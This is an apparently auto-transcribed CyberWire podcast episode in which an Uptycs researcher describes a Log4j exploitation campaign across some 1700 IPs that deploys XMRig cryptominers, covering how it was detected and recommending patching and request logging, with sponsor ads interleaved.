CyberWire Daily - 1700 IPs and counting. [Research Saturday]
Episode Date: June 1, 2024Amit Malik, Director of Threat Research at Uptycs, is sharing their work on "New Threat Detected: Inside Our Discovery of the Log4j Campaign and Its XMRig Malware." The Uptycs Threat Research Team has... discovered a large-scale Log4j campaign involving over 1700 IPs, aiming to deploy XMRig cryptominer malware. This ongoing operation was initially detected through the team's honeypot collection, prompting an in-depth analysis of the campaign. The research says "The JNDI plugin is particularly useful to attackers because it allows them not only to fetch the values of environment variables in the target system but also to freely define the URL and protocol resource for the JNDI network connection." The research can be found here: New Threat Detected: Inside Our Discovery of the Log4j Campaign and Its XMRig Malware Learn more about your ad choices. Visit megaphone.fm/adchoices
Transcript
Discussion (0)
You're listening to the Cyber Wire Network, powered by N2K. of you, I was concerned about my data being sold by data brokers. So I decided to try Delete.me.
I have to say, Delete.me is a game changer. Within days of signing up, they started removing my
personal information from hundreds of data brokers. I finally have peace of mind knowing
my data privacy is protected. Delete.me's team does all the work for you with detailed reports
so you know exactly what's been done. Take control of your data and keep your private life Thank you. Hello, everyone, and welcome to the CyberWires Research Saturday.
I'm Dave Bittner, and this is our weekly conversation with researchers and analysts
tracking down the threats and vulnerabilities, solving some of the hard problems,
and protecting ourselves in a rapidly evolving cyberspace. Thanks for joining us.
Log4j is a very widely used application and it came into the light in December 2021,
right, because there was a zero-day exploit that was available for this application.
That's Amit Malik,
Director of Threat Research at Uptix.
The research we're discussing today
is titled New Threat Detected
inside our discovery of the Log4J campaign
and its XMRig malware.
XMRig Malware.
Now, it's a logging framework and used by pretty much all of the open source applications
and there are many internal and external applications
that company uses.
They use this logging framework library
and it's written in Java.
During that time in 2021, it made a really big impact because since it is a very widely used application and something like
this in this type of application could create a catastrophic event rate. So from that point
in time, we were actually looking into this, the story, how the story
play out for this log4j exploit.
And at that time also in 2021, we published blogs and publications saying how the attackers
are using it.
And suddenly in our intelligence system that we call internally as a global threat intelligence system where we
collect data from all closed and open source sources you know the threat data we collect
into our system and you know we were going through the analysis and then we suddenly
you know our eye popped into this attack chain for low-fault chain. And then we realized that this is a much larger campaign
than just one or two machines involved.
So that's how it came into the light.
Well, let's dig into it here.
I mean, reading through the research,
you all mentioned that you were doing
some routine sandbox hunting analysis
and you discovered this ongoing live campaign. What was going on here?
Yeah, so basically what really happens is that we collect all of this information into our
intelligent systems, right? And then there are multiple components to the intelligent systems.
One of the components is sandbox that processes the malicious samples and we have honeypot servers
also that are part of this intelligent system. So normally what really happens is like when we
get something inside our honeypot, you know, the servers, then we redirect that to the sandbox. So
to understand if it is really a malware or not, right? And in the sandbox, we have our tooling running to detect if something is malicious
inside a particular piece of code. So essentially what happened is that our Honeypot servers
were getting hit by these requests that were used to exploit the Log4j exploit.
And when we redirected those to our sandbox sandbox then we got an alert that there are a
couple of coin miners alerts that we got and our team the analysis team looks at this data on daily
basis doing a regular stuff right so this is their job to identify if something is it's going on not
just specific to log4j but to in, to identify the new things that are coming
into our systems.
And that's where we identified that, okay, this is something that is specific to Log4j,
which is basically more than two years old stuff.
And it is very, very used.
Well, let's dig into some of the details here.
I mean, what can you tell us about this particular campaign?
So I think when we look at this campaign from the origin of Log4J exploit in 2021, right, so there is not much change in terms of the strategy, the attackers use the coin miners and the ransomware specific binaries to basically infect the vulnerable servers.
And in this campaign also, we see that the attackers are using heavily the coin miners.
And primarily what we see is that XMRIG is being used as the major utility to mine the coins.
Right. And this is in line with the previous attacks that we have seen.
The eye-catching thing for us was that
since this is a very widespread application
and it created lots of noise in 2021,
but there are still so many servers that are vulnerable to this vulnerability
and attackers are using this vulnerability
to infect both systems and deploy these coin miners.
We'll be right back.
Do you know the status of your compliance controls right now?
Like, right now.
We know that real-time visibility is critical for security,
but when it comes to our GRC programs, we rely on point-in-time checks.
But get this.
More than 8,000 companies like Atlassian and Quora
have continuous visibility into their controls with Vanta. Here's the gist.
Vanta brings automation to evidence collection across 30 frameworks, like SOC 2 and ISO 27001.
They also centralize key workflows like policies, access reviews, and reporting,
and helps you get security questionnaires done five times faster with AI.
Now that's a new way to GRC.
Get $1,000 off Vanta when you go to vanta.com slash cyber.
That's vanta.com slash cyber for $1,000 off. Do you have any sense for where this is coming from?
So we have done the analysis on the command and control IP addresses.
It's hard to say if the attackers are based in that region, but normally it is Europe
and Russia. So one of the major client and control for this activity, which contributed around 60%
of the total campaign activity that we have highlighted in our blog post as well,
is based in ISP in Europe. So it's hard to say if the attackers are basically of the same origin,
but the activity is originated from Europe and Russia.
And does this seem to be largely opportunistic,
that they're taking advantage of vulnerable systems
to do, as you say, just crypto mining?
Exactly. I mean, this is not a very sophisticated attack.
It is just that, you know,
they are looking for log4g vulnerable applications
and, you know, they're deploying the Decoin miners
to just mine the Decoins, right?
It's not very, I would say,
it's a very sophisticated attack
because it's a two-year-old, very popular vulnerability.
But again, it's very surprising
why there are so many vulnerable systems out there
for this very popular vulnerability.
Are they making any attempt to hide their actions here
or are they being pretty noisy?
Yeah, we haven't really seen any effort to hide the tracks.
It's just that they are coming into the system
and then taking the advantage of vulnerability
just to deploy the XMRig miner,
which is also an open source.
XMRig is also, it's not something that is very,
you know, very private tool used by the attackers.
But yeah.
Well, let's go through some of the ways
that folks can protect themselves against this.
I mean, two years out, I suppose,
you know, patch management would be the top of the list.
Exactly. I mean, as I said,
and you probably also know that it was a very big thing in 2021 when it came out.
And Apache Foundation also released the patch for this one at that time.
And patch management is the only solution.
We have to upgrade the application version to mitigate this.
Is this something also where monitoring your network traffic
would be beneficial?
Yeah, definitely.
It will be helpful in order to, if you have, basically,
let's say if it is Apache server or some type of other server
that is storing the logs that each type of request
that are coming to that particular server then that
can give an indication that hey you know somebody is trying to exploit the vulnerability so uh so
definitely there are network uh you know related uh or the security solutions that are deployed
then they should be able to catch it or if there is logging enabled on the servers that basically capture the requests
that are coming to the servers,
then that should also help to identify this attack.
It really is remarkable.
I think that it's been so long
since Log4J came upon the scene here
and we've still got these ongoing issues.
From a high level, what do you suppose is going on here?
Do you suppose there's just a lot of systems that folks aren't aware of that should be
patched that haven't been yet?
I think that's what it looks like, Dave, that even though it was a very widespread issue and lots of people were very aware of it,
the people that deals with these technologies,
but it looks like that there is some part
of the person of the world that is not really,
either they do not know,
like they are running these applications
for these servers and these servers are internet facing
or they might not really have looked or given much care to those servers that these servers are exposed to the internet.
Our thanks to Amit Malik from Uptix for joining us.
The research is titled New Threat Detected Inside Our Discovery of the Log4J Campaign
and its XMRig Malware.
We'll have a link in the show notes.
And now, a message from Black Cloak.
Did you know the easiest way for cybercriminals to bypass your company's defenses is by targeting your executives and their families at home?
Black Cloak's award-winning digital executive protection platform
secures their personal devices, home networks, and connected lives. Because when executives are compromised at home, Thank you. with Black Cloak. Learn more at blackcloak.io.
And that's Research Saturday,
brought to you by N2K CyberWire.
Our thanks to Amit Malik from Uptix for joining us.
The research is titled,
New Threat Detected,
Inside Our Discovery of the Log4J Campaign and its XM Rig Malware. You can find a link and additional resources in the show notes.
We'd love to know what you think of this podcast. Your feedback ensures we deliver the insights that
keep you a step ahead in the rapidly changing world of cybersecurity. If you like the show,
please share a rating and review in your podcast app.
Please also fill out the survey in the show notes or send an email to cyberwire at n2k.com.
We're privileged that N2K Cyber Wire is part of the daily routine of the most influential leaders and operators in the public and private sector, from the Fortune 500 to many of the world's
preeminent intelligence and law enforcement agencies. N2K makes it easy for companies to optimize your biggest investment, your people.
We make you smarter about your teams while making your teams smarter.
Learn how at n2k.com.
This episode was produced by Liz Stokes.
We're mixed by Elliot Peltzman and Trey Hester.
Our executive producer is Jennifer Iben.
Our executive editor is Brandon Karp.
Simone Petrella is our president.
Peter Kilpie is our publisher.
And I'm Dave Bittner.
Thanks for listening.
We'll see you back here next time.
Thank you. and data into innovative uses that deliver measurable impact. Secure AI agents connect,
prepare, and automate your data workflows, helping you gain insights, receive alerts,
and act with ease through guided apps tailored to your role. Data is hard. Domo is easy. Learn more at ai.domo.com. That's ai.domo.com.